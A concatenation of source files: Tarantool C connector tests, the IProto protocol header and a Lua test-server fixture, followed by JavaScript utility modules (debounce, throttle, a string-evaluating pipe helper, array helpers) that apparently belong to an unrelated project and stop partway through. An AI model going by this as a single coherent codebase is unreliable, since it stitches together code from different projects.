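 */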
#define ok(condition, fmt, args...) { \
int res = __ok(condition, fmt, ##args); \
if (!res) { \
__space(stderr); \
fprintf(stderr, "# Failed test '"); \
fprintf(stderr, fmt, ##args); \
fprintf(stderr, "'\n"); \
__space(stderr); \
fprintf(stderr, "# in %s at line %d\n", __FILE__, __LINE__); \
} \
res = res; \
}
#define is(a, b, fmt, args...) { \
int res = __ok((a) == (b), fmt, ##args); \
if (!res) { \
__space(stderr); \
fprintf(stderr, "# Failed test '"); \
fprintf(stderr, fmt, ##args); \
fprintf(stderr, "'\n"); \
__space(stderr); \
fprintf(stderr, "# in %s at line %d\n", __FILE__, __LINE__); \
} \
res = res; \
}
#define isnt(a, b, fmt, args...) { \
int res = __ok((a) != (b), fmt, ##args); \
if (!res) { \
__space(stderr); \
fprintf(stderr, "# Failed test '"); \
fprintf(stderr, fmt, ##args); \
fprintf(stderr, "'\n"); \
__space(stderr); \
fprintf(stderr, "# in %s at line %d\n", __FILE__, __LINE__); \
} \
res = res; \
}
#define fail(fmt, args...) \
ok(0, fmt, ##args)
#define skip(fmt, args...) \
ok(1, "Skipping: " fmt, ##args)
#endif /* TEST_H_INCLUDED */
<|start_filename|>test/unix/tarantool_unix.c<|end_filename|>
#include "test.h"
#include <string.h>
#include <stdlib.h>
#include <stdint.h>
#include <assert.h>
#include <tarantool/tarantool.h>
#include <tarantool/tnt_net.h>
#include <tarantool/tnt_opt.h>
#include <uri.h> /* for tnt_set_credentials() */
#include "common.h"
#define header() note("*** %s: prep ***", __func__)
#define footer() note("*** %s: done ***", __func__)
/* XXX: Cannot use user:pass@unix/:/path/to/socket (gh-120). */
static void
tnt_set_credentials(struct tnt_stream *s, const char *login,
const char *password)
{
struct tnt_stream_net *sn = TNT_SNET_CAST(s);
struct uri *uri = sn->opt.uri;
uri->login = login;
uri->login_len = strlen(login);
uri->password = password;
uri->password_len = strlen(password);
}
static int
test_connect_unix(const char *uri) {
plan(3);
header();
struct tnt_stream *tnt = NULL; tnt = tnt_net(NULL);
isnt(tnt, NULL, "Check connection creation");
isnt(tnt_set(tnt, TNT_OPT_URI, uri), -1, "Setting URI");
tnt_set_credentials(tnt, "test", "test");
isnt(tnt_connect(tnt), -1, "Connecting");
// isnt(tnt_authenticate(tnt), -1, "Authenticating");
tnt_stream_free(tnt);
footer();
return check_plan();
}
static int
test_ping(const char *uri) {
plan(7);
header();
struct tnt_stream *tnt = NULL; tnt = tnt_net(NULL);
isnt(tnt, NULL, "Check connection creation");
isnt(tnt_set(tnt, TNT_OPT_URI, uri), -1, "Setting URI");
tnt_set_credentials(tnt, "test", "test");
isnt(tnt_connect(tnt), -1, "Connecting");
// isnt(tnt_authenticate(tnt), -1, "Authenticating");
isnt(tnt_ping(tnt), -1, "Create ping");
isnt(tnt_flush(tnt), -1, "Send to server");
struct tnt_reply reply;
tnt_reply_init(&reply);
isnt(tnt->read_reply(tnt, &reply), -1, "Read reply from server");
is (reply.error, NULL, "Check error absence");
tnt_reply_free(&reply);
tnt_stream_free(tnt);
footer();
return check_plan();
}
static int
test_auth_call(const char *uri) {
plan(21);
header();
struct tnt_stream *args = NULL; args = tnt_object(NULL);
isnt(args, NULL, "Check object creation");
isnt(tnt_object_format(args, "[]"), -1, "check object filling");
struct tnt_reply reply;
struct tnt_stream *tnt = NULL; tnt = tnt_net(NULL);
isnt(tnt, NULL, "Check connection creation");
isnt(tnt_set(tnt, TNT_OPT_URI, uri), -1, "Setting URI");
tnt_set_credentials(tnt, "test", "test");
isnt(tnt_connect(tnt), -1, "Connecting");
// isnt(tnt_authenticate(tnt), -1, "Authenticating");
isnt(tnt_deauth(tnt), -1, "Create deauth");
isnt(tnt_flush(tnt), -1, "Send to server");
tnt_reply_init(&reply);
isnt(tnt->read_reply(tnt, &reply), -1, "Read reply from server");
is(reply.error, NULL, "Check error absence");
tnt_reply_free(&reply);
isnt(tnt_call_16(tnt, "test_4", 6, args), -1, "Create call request");
isnt(tnt_flush(tnt), -1, "Send to server");
tnt_reply_init(&reply);
isnt(tnt->read_reply(tnt, &reply), -1, "Read reply from server");
is (reply.error, NULL, "Check error absence");
tnt_reply_free(&reply);
isnt(tnt_auth(tnt, "test", 4, "test", 4), -1, "Create auth");
isnt(tnt_flush(tnt), -1, "Send to server");
tnt_reply_init(&reply);
isnt(tnt->read_reply(tnt, &reply), -1, "Read reply from server");
is (reply.error, NULL, "Check error absence");
tnt_reply_free(&reply);
isnt(tnt_eval(tnt, "return test_4()", 15, args), -1, "Create eval "
"request");
isnt(tnt_flush(tnt), -1, "Send to server");
tnt_reply_init(&reply);
isnt(tnt->read_reply(tnt, &reply), -1, "Read reply from server");
is (reply.error, NULL, "Check error absence");
tnt_stream_free(args);
tnt_reply_free(&reply);
tnt_stream_free(tnt);
footer();
return check_plan();
}
static int
test_insert_replace_delete(const char *uri) {
plan(186);
header();
struct tnt_stream *tnt = NULL; tnt = tnt_net(NULL);
isnt(tnt, NULL, "Check connection creation");
isnt(tnt_set(tnt, TNT_OPT_URI, uri), -1, "Setting URI");
tnt_set_credentials(tnt, "test", "test");
isnt(tnt_connect(tnt), -1, "Connecting");
// isnt(tnt_authenticate(tnt), -1, "Authenticating");
tnt_stream_reqid(tnt, 0);
for (int i = 0; i < 10; ++i) {
char ex[128] = {0};
size_t ex_len = snprintf(ex, 128, "examplestr %d %d", i, i*i);
struct tnt_stream *val = tnt_object(NULL);
tnt_object_format(val, "[%d%d%.*s]", i, i + 10, ex_len, ex);
tnt_insert(tnt, 512, val);
tnt_stream_free(val);
}
isnt(tnt_flush(tnt), -1, "Send package to server");
struct tnt_iter it;
tnt_iter_reply(&it, tnt);
while (tnt_next(&it)) {
struct tnt_reply *r = TNT_IREPLY_PTR(&it);
uint32_t i = r->sync, str_len = 0;
char ex[128] = {0};
size_t ex_len = snprintf(ex, 128, "examplestr %d %d", i, i*i);
isnt(r->data, NULL, "check that we get answer");
const char *data = r->data;
is (mp_typeof(*data), MP_ARRAY, "Check array");
is (mp_decode_array(&data), 1, "Check array, again");
is (mp_decode_array(&data), 3, "And again (another)");
ok (mp_typeof(*data) == MP_UINT &&
mp_decode_uint(&data) == i &&
mp_typeof(*data) == MP_UINT &&
mp_decode_uint(&data) == i + 10 &&
mp_typeof(*data) == MP_STR &&
strncmp(mp_decode_str(&data, &str_len), ex, ex_len) == 0,
"Check fields");
}
tnt_stream_reqid(tnt, 0);
for (int i = 0; i < 5; ++i) {
char ex[128] = {0};
size_t ex_len;
ex_len = snprintf(ex, 128, "anotherexamplestr %d %d", i, i*i);
struct tnt_stream *val = tnt_object(NULL);
tnt_object_format(val, "[%d%d%.*s]", i, i + 5, ex_len, ex);
tnt_replace(tnt, 512, val);
tnt_stream_free(val);
}
isnt(tnt_flush(tnt), -1, "Send package to server");
tnt_iter_reply(&it, tnt);
while (tnt_next(&it)) {
struct tnt_reply *r = TNT_IREPLY_PTR(&it);
uint32_t i = r->sync, str_len = 0;
char ex[128] = {0};
size_t ex_len;
ex_len = snprintf(ex, 128, "anotherexamplestr %d %d", i, i*i);
isnt(r->data, NULL, "check that we get answer");
const char *data = r->data;
is (mp_typeof(*data), MP_ARRAY, "Check array");
is (mp_decode_array(&data), 1, "Check array, again");
is (mp_decode_array(&data), 3, "And again (another)");
ok (mp_typeof(*data) == MP_UINT &&
mp_decode_uint(&data) == i &&
mp_typeof(*data) == MP_UINT &&
mp_decode_uint(&data) == i + 5 &&
mp_typeof(*data) == MP_STR &&
strncmp(mp_decode_str(&data, &str_len), ex, ex_len) == 0,
"Check fields");
}
struct tnt_stream *key = NULL; key = tnt_object(NULL);
isnt(key, NULL, "Check object creation");
is (tnt_object_add_array(key, 0), 1, "Create key");
tnt_select(tnt, 512, 0, UINT32_MAX, 0, 0, key);
tnt_stream_free(key);
tnt_flush(tnt);
struct tnt_reply reply; tnt_reply_init(&reply);
isnt(tnt->read_reply(tnt, &reply), -1, "Read reply");
const char *data = reply.data;
is (mp_typeof(*data), MP_ARRAY, "Check array");
uint32_t vsz = mp_decode_array(&data);
is (vsz, 10, "Check array, again");
uint32_t arrsz = vsz;
uint32_t str_len = 0;
while (arrsz-- > 0) {
is (mp_decode_array(&data), 3, "And again (another)");
is (mp_typeof(*data), MP_UINT, "check int");
uint32_t sz = mp_decode_uint(&data);
is (mp_typeof(*data), MP_UINT, "check int");
uint32_t sz_z = sz + 10; if (sz < 5) sz_z -= 5;
uint32_t vsz = mp_decode_uint(&data);
is (vsz, sz_z, "check int val");
char ex[128] = {0};
size_t ex_len = 0;
if (sz < 5)
ex_len = snprintf(ex, 128, "anotherexamplestr %d %d",
sz, sz*sz);
else
ex_len = snprintf(ex, 128, "examplestr %d %d", sz, sz*sz);
ok (mp_typeof(*data) == MP_STR &&
strncmp(mp_decode_str(&data, &str_len), ex, ex_len) == 0,
"Check str");
}
tnt_reply_free(&reply);
tnt_stream_reqid(tnt, 0);
for (int i = 0; i < 10; ++i) {
struct tnt_stream *key = tnt_object(NULL);
tnt_object_format(key, "[%d]", i);
tnt_delete(tnt, 512, 0, key);
tnt_stream_free(key);
}
isnt(tnt_flush(tnt), -1, "Send package to server");
tnt_iter_reply(&it, tnt);
while (tnt_next(&it)) {
struct tnt_reply *r = TNT_IREPLY_PTR(&it);
uint32_t i = r->sync, str_len = 0, nlen = (i < 5 ? i + 5 : i + 10);
char ex[128] = {0};
size_t ex_len = 0;
if (i < 5)
ex_len = snprintf(ex, 128, "anotherexamplestr %d %d",
i, i*i);
else
ex_len = snprintf(ex, 128, "examplestr %d %d", i, i*i);
isnt(r->data, NULL, "check that we get answer");
const char *data = r->data;
is (mp_typeof(*data), MP_ARRAY, "Check array");
is (mp_decode_array(&data), 1, "Check array, again");
is (mp_decode_array(&data), 3, "And again (another)");
ok (mp_typeof(*data) == MP_UINT &&
mp_decode_uint(&data) == i &&
mp_typeof(*data) == MP_UINT &&
mp_decode_uint(&data) == nlen &&
mp_typeof(*data) == MP_STR &&
strncmp(mp_decode_str(&data, &str_len), ex, ex_len) == 0,
"Check fields");
}
tnt_stream_free(tnt);
footer();
return check_plan();
}
static int
test_execute(const char *uri) {
plan(39);
header();
struct tnt_reply reply;
char *query;
struct tnt_stream *args = NULL;
struct tnt_stream *tnt = NULL; tnt = tnt_net(NULL);
isnt(tnt, NULL, "Check connection creation");
isnt(tnt_set(tnt, TNT_OPT_URI, uri), -1, "Setting URI");
tnt_set_credentials(tnt, "test", "test");
isnt(tnt_connect(tnt), -1, "Connecting");
/* Skip tests on Tarantool 1x. */
struct tnt_stream_net *sn = TNT_SNET_CAST(tnt);
if (strncmp(sn->greeting, "Tarantool 1.", 12) == 0) {
tnt_stream_free(tnt);
for (int i = 0; i < 36; ++i)
skip("Tarantool 2x required");
footer();
return check_plan();
}
args = tnt_object(NULL);
isnt(args, NULL, "Check object creation");
isnt(tnt_object_format(args, "[]"), -1, "check object filling");
query = "CREATE TABLE test_table(id INTEGER, PRIMARY KEY (id))";
isnt(tnt_execute(tnt, query, strlen(query), args), -1,
"Create execute sql request: create table");
isnt(tnt_flush(tnt), -1, "Send to server");
tnt_stream_free(args);
tnt_reply_init(&reply);
isnt(tnt->read_reply(tnt, &reply), -1, "Read reply from server");
is (reply.error, NULL, "Check error absence");
isnt(reply.sqlinfo, NULL, "Check sqlinfo presence");
is (reply.metadata, NULL, "Check metadata absence");
is (reply.data, NULL, "Check data absence");
tnt_reply_free(&reply);
args = tnt_object(NULL);
isnt(args, NULL, "Check object creation");
isnt(tnt_object_format(args, "[%d]", 0), -1, "check object filling");
query = "INSERT INTO test_table(id) VALUES (?)";
isnt(tnt_execute(tnt, query, strlen(query), args), -1,
"Create execute sql request: insert row");
isnt(tnt_flush(tnt), -1, "Send to server");
tnt_stream_free(args);
tnt_reply_init(&reply);
isnt(tnt->read_reply(tnt, &reply), -1, "Read reply from server");
is (reply.error, NULL, "Check error absence");
isnt(reply.sqlinfo, NULL, "Check sqlinfo presence");
is (reply.metadata, NULL, "Check metadata absence");
is (reply.data, NULL, "Check data absence");
tnt_reply_free(&reply);
args = tnt_object(NULL);
isnt(args, NULL, "Check object creation");
isnt(tnt_object_format(args, "[]"), -1, "check object filling");
query = "select * from test_table";
isnt(tnt_execute(tnt, query, strlen(query), args), -1,
"Create execute sql request: select");
isnt(tnt_flush(tnt), -1, "Send to server");
tnt_stream_free(args);
tnt_reply_init(&reply);
isnt(tnt->read_reply(tnt, &reply), -1, "Read reply from server");
is (reply.error, NULL, "Check error absence");
is (reply.sqlinfo, NULL, "Check sqlinfo absence");
isnt(reply.metadata, NULL, "Check metadata presence");
isnt(reply.data, NULL, "Check data presence");
tnt_reply_free(&reply);
args = tnt_object(NULL);
isnt(args, NULL, "Check object creation");
isnt(tnt_object_format(args, "[]"), -1, "check object filling");
query = "drop table test_table";
isnt(tnt_execute(tnt, query, strlen(query), args), -1,
"Create execute sql request: drop table");
isnt(tnt_flush(tnt), -1, "Send to server");
tnt_stream_free(args);
tnt_reply_init(&reply);
isnt(tnt->read_reply(tnt, &reply), -1, "Read reply from server");
is (reply.error, NULL, "Check error absence");
isnt(reply.sqlinfo, NULL, "Check sqlinfo presence");
is (reply.metadata, NULL, "Check metadata absence");
is (reply.data, NULL, "Check data absence");
tnt_reply_free(&reply);
tnt_stream_free(tnt);
footer();
return check_plan();
}
int main() {
plan(5);
/*
* XXX: Cannot use user:pass@unix/:/path/to/socket
* (gh-120).
*/
const char *uri = getenv("LISTEN");
	/* Ensure the URI refers to a unix socket path. */
assert(strstr(uri, "/") != NULL);
test_connect_unix(uri);
test_ping(uri);
test_auth_call(uri);
test_insert_replace_delete(uri);
test_execute(uri);
return check_plan();
}
<|start_filename|>include/tarantool/tnt_proto.h<|end_filename|>
#ifndef TNT_PROTO_H_INCLUDED
#define TNT_PROTO_H_INCLUDED
/*
* Redistribution and use in source and binary forms, with or
* without modification, are permitted provided that the following
* conditions are met:
*
* 1. Redistributions of source code must retain the above
* copyright notice, this list of conditions and the
* following disclaimer.
*
* 2. Redistributions in binary form must reproduce the above
* copyright notice, this list of conditions and the following
* disclaimer in the documentation and/or other materials
* provided with the distribution.
*
* THIS SOFTWARE IS PROVIDED BY <COPYRIGHT HOLDER> ``AS IS'' AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED
* TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
* A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL
* <COPYRIGHT HOLDER> OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
* INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
* SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR
* BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
* LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
* (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF
* THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*/
/**
* \file tnt_proto.h
* \brief IProto protocol constants
*/
/**
* \brief Request/response header field types (keys)
*/
enum tnt_header_key_t {
TNT_CODE = 0x00,
TNT_SYNC = 0x01,
TNT_SERVER_ID = 0x02,
TNT_LSN = 0x03,
TNT_TIMESTAMP = 0x04,
TNT_SCHEMA_ID = 0x05
};
/**
* \brief Request body field types (keys)
*/
enum tnt_body_key_t {
TNT_SPACE = 0x10,
TNT_INDEX = 0x11,
TNT_LIMIT = 0x12,
TNT_OFFSET = 0x13,
TNT_ITERATOR = 0x14,
TNT_INDEX_BASE = 0x15,
TNT_KEY = 0x20,
TNT_TUPLE = 0x21,
TNT_FUNCTION = 0x22,
TNT_USERNAME = 0x23,
TNT_SERVER_UUID = 0x24,
TNT_CLUSTER_UUID = 0x25,
TNT_VCLOCK = 0x26,
TNT_EXPRESSION = 0x27,
TNT_OPS = 0x28,
TNT_SQL_TEXT = 0x40,
TNT_SQL_BIND = 0x41,
};
enum tnt_response_type_t {
TNT_OK = 0x00,
TNT_CHUNK = 0x80,
};
/**
* \brief Response body field types (keys)
*/
enum tnt_response_key_t {
TNT_DATA = 0x30,
TNT_ERROR = 0x31,
TNT_METADATA = 0x32,
TNT_SQL_INFO = 0x42,
};
/**
* \brief Request types
*/
enum tnt_request_t {
TNT_OP_SELECT = 1,
TNT_OP_INSERT = 2,
TNT_OP_REPLACE = 3,
TNT_OP_UPDATE = 4,
TNT_OP_DELETE = 5,
TNT_OP_CALL_16 = 6,
TNT_OP_AUTH = 7,
TNT_OP_EVAL = 8,
TNT_OP_UPSERT = 9,
TNT_OP_CALL = 10,
TNT_OP_EXECUTE = 11,
TNT_OP_PING = 64,
TNT_OP_JOIN = 65,
TNT_OP_SUBSCRIBE = 66
};
/**
* \brief Update operations
*/
enum tnt_update_op_t {
TNT_UOP_ADDITION = '+',
TNT_UOP_SUBSTRACT = '-',
TNT_UOP_AND = '&',
TNT_UOP_XOR = '^',
TNT_UOP_OR = '|',
TNT_UOP_DELETE = '#',
TNT_UOP_INSERT = '!',
TNT_UOP_ASSIGN = '=',
TNT_UOP_SPLICE = ':',
};
/**
* \brief Iterator types
*/
enum tnt_iterator_t {
TNT_ITER_EQ = 0,
TNT_ITER_REQ,
TNT_ITER_ALL,
TNT_ITER_LT,
TNT_ITER_LE,
TNT_ITER_GE,
TNT_ITER_GT,
TNT_ITER_BITS_ALL_SET,
TNT_ITER_BITS_ANY_SET,
TNT_ITER_BITS_ALL_NOT_SET,
TNT_ITER_OVERLAP,
TNT_ITER_NEIGHBOR,
};
/**
* \internal
*/
#define TNT_SCRAMBLE_SIZE 20
/**
* \internal
*/
#define TNT_GREETING_SIZE 128
/**
* \internal
*/
#define TNT_VERSION_SIZE 64
/**
* \internal
*/
#define TNT_SALT_SIZE 44
/**
* \brief System spaces
*/
enum tnt_spaces_t {
tnt_sp_space = 280,
tnt_sp_index = 288,
tnt_sp_func = 296,
tnt_sp_user = 304,
tnt_sp_priv = 312,
tnt_vsp_space = 281,
tnt_vsp_index = 289,
tnt_vsp_func = 297,
tnt_vsp_user = 305,
tnt_vsp_priv = 313,
};
/**
* \brief System indexes
*/
enum tnt_indexes_t {
tnt_vin_primary = 0,
tnt_vin_owner = 1,
tnt_vin_name = 2,
};
/**
* \brief Error code types
*/
enum tnt_errcode_t {
TNT_ER_UNKNOWN = 0,
TNT_ER_ILLEGAL_PARAMS = 1,
TNT_ER_MEMORY_ISSUE = 2,
TNT_ER_TUPLE_FOUND = 3,
TNT_ER_TUPLE_NOT_FOUND = 4,
TNT_ER_UNSUPPORTED = 5,
TNT_ER_NONMASTER = 6,
TNT_ER_READONLY = 7,
TNT_ER_INJECTION = 8,
TNT_ER_CREATE_SPACE = 9,
TNT_ER_SPACE_EXISTS = 10,
TNT_ER_DROP_SPACE = 11,
TNT_ER_ALTER_SPACE = 12,
TNT_ER_INDEX_TYPE = 13,
TNT_ER_MODIFY_INDEX = 14,
TNT_ER_LAST_DROP = 15,
TNT_ER_TUPLE_FORMAT_LIMIT = 16,
TNT_ER_DROP_PRIMARY_KEY = 17,
TNT_ER_KEY_PART_TYPE = 18,
TNT_ER_EXACT_MATCH = 19,
TNT_ER_INVALID_MSGPACK = 20,
TNT_ER_PROC_RET = 21,
TNT_ER_TUPLE_NOT_ARRAY = 22,
TNT_ER_FIELD_TYPE = 23,
TNT_ER_FIELD_TYPE_MISMATCH = 24,
TNT_ER_SPLICE = 25,
TNT_ER_ARG_TYPE = 26,
TNT_ER_TUPLE_IS_TOO_LONG = 27,
TNT_ER_UNKNOWN_UPDATE_OP = 28,
TNT_ER_UPDATE_FIELD = 29,
TNT_ER_FIBER_STACK = 30,
TNT_ER_KEY_PART_COUNT = 31,
TNT_ER_PROC_LUA = 32,
TNT_ER_NO_SUCH_PROC = 33,
TNT_ER_NO_SUCH_TRIGGER = 34,
TNT_ER_NO_SUCH_INDEX = 35,
TNT_ER_NO_SUCH_SPACE = 36,
TNT_ER_NO_SUCH_FIELD = 37,
TNT_ER_SPACE_FIELD_COUNT = 38,
TNT_ER_INDEX_FIELD_COUNT = 39,
TNT_ER_WAL_IO = 40,
TNT_ER_MORE_THAN_ONE_TUPLE = 41,
TNT_ER_ACCESS_DENIED = 42,
TNT_ER_CREATE_USER = 43,
TNT_ER_DROP_USER = 44,
TNT_ER_NO_SUCH_USER = 45,
TNT_ER_USER_EXISTS = 46,
TNT_ER_PASSWORD_MISMATCH = 47,
TNT_ER_UNKNOWN_REQUEST_TYPE = 48,
TNT_ER_UNKNOWN_SCHEMA_OBJECT = 49,
TNT_ER_CREATE_FUNCTION = 50,
TNT_ER_NO_SUCH_FUNCTION = 51,
TNT_ER_FUNCTION_EXISTS = 52,
TNT_ER_FUNCTION_ACCESS_DENIED = 53,
TNT_ER_FUNCTION_MAX = 54,
TNT_ER_SPACE_ACCESS_DENIED = 55,
TNT_ER_USER_MAX = 56,
TNT_ER_NO_SUCH_ENGINE = 57,
TNT_ER_RELOAD_CFG = 58,
TNT_ER_CFG = 59,
TNT_ER_SOPHIA = 60,
TNT_ER_LOCAL_SERVER_IS_NOT_ACTIVE = 61,
TNT_ER_UNKNOWN_SERVER = 62,
TNT_ER_CLUSTER_ID_MISMATCH = 63,
TNT_ER_INVALID_UUID = 64,
TNT_ER_CLUSTER_ID_IS_RO = 65,
TNT_ER_RESERVED66 = 66,
TNT_ER_SERVER_ID_IS_RESERVED = 67,
TNT_ER_INVALID_ORDER = 68,
TNT_ER_MISSING_REQUEST_FIELD = 69,
TNT_ER_IDENTIFIER = 70,
TNT_ER_DROP_FUNCTION = 71,
TNT_ER_ITERATOR_TYPE = 72,
TNT_ER_REPLICA_MAX = 73,
TNT_ER_INVALID_XLOG = 74,
TNT_ER_INVALID_XLOG_NAME = 75,
TNT_ER_INVALID_XLOG_ORDER = 76,
TNT_ER_NO_CONNECTION = 77,
TNT_ER_TIMEOUT = 78,
TNT_ER_ACTIVE_TRANSACTION = 79,
TNT_ER_NO_ACTIVE_TRANSACTION = 80,
TNT_ER_CROSS_ENGINE_TRANSACTION = 81,
TNT_ER_NO_SUCH_ROLE = 82,
TNT_ER_ROLE_EXISTS = 83,
TNT_ER_CREATE_ROLE = 84,
TNT_ER_INDEX_EXISTS = 85,
TNT_ER_TUPLE_REF_OVERFLOW = 86,
TNT_ER_ROLE_LOOP = 87,
TNT_ER_GRANT = 88,
TNT_ER_PRIV_GRANTED = 89,
TNT_ER_ROLE_GRANTED = 90,
TNT_ER_PRIV_NOT_GRANTED = 91,
TNT_ER_ROLE_NOT_GRANTED = 92,
TNT_ER_MISSING_SNAPSHOT = 93,
TNT_ER_CANT_UPDATE_PRIMARY_KEY = 94,
TNT_ER_UPDATE_INTEGER_OVERFLOW = 95,
TNT_ER_GUEST_USER_PASSWORD = 96,
TNT_ER_TRANSACTION_CONFLICT = 97,
TNT_ER_UNSUPPORTED_ROLE_PRIV = 98,
TNT_ER_LOAD_FUNCTION = 99,
TNT_ER_FUNCTION_LANGUAGE = 100,
TNT_ER_RTREE_RECT = 101,
TNT_ER_PROC_C = 102,
TNT_ER_UNKNOWN_RTREE_INDEX_DISTANCE_TYPE = 103,
TNT_ER_PROTOCOL = 104,
TNT_ER_UPSERT_UNIQUE_SECONDARY_KEY = 105,
TNT_ER_WRONG_INDEX_RECORD = 106,
TNT_ER_WRONG_INDEX_PARTS = 107,
TNT_ER_WRONG_INDEX_OPTIONS = 108,
TNT_ER_WRONG_SCHEMA_VERSION = 109,
TNT_ER_SLAB_ALLOC_MAX = 110,
};
#endif /* TNT_PROTO_H_INCLUDED */
<|start_filename|>test/common/box.lua<|end_filename|>
#!/usr/bin/env tarantool
local os = require('os')
local fiber = require('fiber')
local console = require('console')
box.cfg{
listen = os.getenv('LISTEN'),
}
console.listen(os.getenv('ADMIN'))
lp = {
test = 'test',
test_empty = '',
test_big = string.rep('1234567890', 6)
}
box.once('init', function()
for k, v in pairs(lp) do
box.schema.user.create(k, { password = v })
if k == 'test' then
-- Read and write are needed due to Tarantool
-- 1.7.6-27-g7ef5be2 in CI and
-- https://github.com/tarantool/tarantool/issues/3017
-- Create grant is needed to create a table with tnt_execute().
box.schema.user.grant('test', 'read,write,execute,create',
'universe')
end
end
local test = box.schema.space.create('test')
test:create_index('primary', {type = 'TREE', unique = true, parts = {1, 'unsigned'}})
test:create_index('secondary', {type = 'TREE', unique = false, parts = {2, 'unsigned', 3, 'string'}})
box.schema.user.grant('test', 'read,write', 'space', 'test')
local msgpack = box.schema.space.create('msgpack')
msgpack:create_index('primary', {parts = {1, 'unsigned'}})
box.schema.user.grant('test', 'read,write', 'space', 'msgpack')
msgpack:insert{1, 'float as key', {[2.7] = {1, 2, 3}}}
msgpack:insert{2, 'array as key', {[{2, 7}] = {1, 2, 3}}}
msgpack:insert{3, 'array with float key as key', {[{[2.7] = 3, [7] = 7}] = {1, 2, 3}}}
msgpack:insert{6, 'array with string key as key', {['megusta'] = {1, 2, 3}}}
-- Grant the following functions to 'guest' user.
for _, func in ipairs({'test_4', 'is_positive'}) do
box.schema.func.create(func)
box.schema.user.grant('guest', 'execute', 'function', func);
end
end)
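-- The functions below are server-side fixtures used by the client test
-- suites (test_4, for example, is invoked via tnt_call_16()/tnt_eval() in
-- the unix tests); they are not part of the connector itself.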
function test_1()
require('log').error('1')
return true, {
c = {
['106'] = {1, 1428578535},
['2'] = {1, 1428578535}
},
pc = {
['106'] = {1, 1428578535, 9243},
['2'] = {1, 1428578535, 9243}
},
s = {1, 1428578535},
u = 1428578535,
v = {}
}, true
end
function test_2()
return { k2 = 'v', k1 = 'v2'}
end
function test_3(x, y)
return x + y
end
function test_4()
return box.session.user()
end
function test_5()
if box.session.push == nil then
return false
end
for i = 1, 10 do
box.session.push({ position = i, value = 'i love maccartney' })
end
return true
end
function is_positive(x)
return x > 0
end
<|start_filename|>src/function.js<|end_filename|>
/** @module Function */
/**
 * Converts the function fn into a run-once function. The returned function executes fn at most once.
 * @function once
 * @param {function} fn - The function to execute.
* @return {function}
* @example
* const fn = once(() => '5')
* console.log([fn(), fn()])
* // => ['5', undefined]
*/
export const once = fn => {
let called = false
return function (...args) {
if (called) return
called = true
return fn.apply(this, args)
}
}
/**
 * Converts the function fn into a debounced function. Returns the debounced function.
* @function debounce
 * @param {function} fn - The function to debounce.
 * @param {number} [delay=0] - Optional. Debounce delay in milliseconds, defaults to 0.
* @returns {function}
* @example
* window.addEventListener('resize', U.debounce(() => {
* console.log(window.innerWidth);
* console.log(window.innerHeight);
* }, 250));
 * // => After resizing the browser window, the window size is logged to the console once, 250ms later
*/
export const debounce = (fn, delay = 0) => {
let timeoutId
return function(...args) {
clearTimeout(timeoutId)
timeoutId = setTimeout(() => fn.apply(this, args), delay)
}
}
/**
 * Converts the function fn into a throttled function. Returns the throttled function.
* @function throttle
 * @param {function} fn - The function to throttle.
 * @param {number} wait - Throttle interval in milliseconds.
* @return {function}
* @example
* window.addEventListener('resize', U.throttle(function(evt) {
* console.log(window.innerWidth);
* console.log(window.innerHeight);
* }, 250));
 * // Resizing the browser window logs the window size to the console at most once every 250ms
*/
export const throttle = (fn, wait) => {
let inThrottle, lastFn, lastTime
return function() {
const context = this, args = arguments
if (!inThrottle) {
fn.apply(context, args)
lastTime = Date.now()
inThrottle = true
} else {
clearTimeout(lastFn)
lastFn = setTimeout(function() {
if (Date.now() - lastTime >= wait) {
fn.apply(context, args)
lastTime = Date.now()
}
}, Math.max(wait - (Date.now() - lastTime), 0))
}
}
}
/**
 * Pipe function. The placeholder "$" stands for the result of the previous function, e.g. pipe(x, `a |> b($, y)`) is equivalent to b(a(x), y).
* @function pipe
 * @param {*} param - The initial argument for the pipeline.
 * @param {string} line - The pipeline expression.
* @return {*}
* @example
* const x = 1;
* const y = 3;
*
* const a = n => n + 1;
* const b = (x, y)=> x * y;
* const c = n => n * n;
*
* pipe(x, `a |> b($, y)`)
* // => 6
*
* pipe(x, `a |> c`)
* // => 4
*/
export const pipe = (param, line) => {
return line.split('|>')
.reduce((acc, fn) => {
fn = fn.indexOf('(') > -1
? fn.replace(/[\(|,]\s*\$\s*[\)|,]/g, w => w.replace('$', 'acc'))
: `${fn}(acc)`
return acc = new Function('acc', 'return ' + fn)(acc)
}, param)
}
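// Note: pipe() resolves the names in `line` through new Function, which only
// sees the global scope and not local closures, so the functions referenced in
// the pipeline string must be reachable as globals. A minimal usage sketch
// under that assumption (inc/mul are hypothetical helpers shown as globals
// purely for illustration):
//
//   globalThis.inc = n => n + 1
//   globalThis.mul = (x, y) => x * y
//   pipe(1, 'inc |> mul($, 3)')   // => 6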
<|start_filename|>src/array.js<|end_filename|>
/** @module Array */
import { isFunction } from './type'
/**
 * Gets the last element of an array
* @function lastItem
 * @param {array} arr - The source array
* @return {*}
* @example
* let value = U.lastItem([1, 1, 2, 3])
* // => 3
*
* let value = U.lastItem([])
* // => undefined
*/
export const lastItem = arr => arr[arr.length -1]
/**
 * Removes duplicate values from an array, returning a new array without duplicates.
* @function uniqueItems
 * @param {array} arr - The source array to deduplicate
* @return {array}
* @example
* let arr = [1, 1, 2, 3, 3, 4, 5]
* arr = U.uniqueItems(arr)
* // => [1, 2, 3, 4, 5]
*/
export const uniqueItems = arr => [...new Set(arr)]
/**
 * Returns all unique values of an array, based on a provided comparator function.
* @function uniqueItemsBy
 * @param {array} arr - The array
 * @param {function} fn - The comparator function
 * @param {*} fn.a - Element being compared
 * @param {*} fn.b - Element being compared
 * @param {boolean} [isRight=false] - Optional, defaults to false; whether to start comparing from the last element of the array
* @return {array}
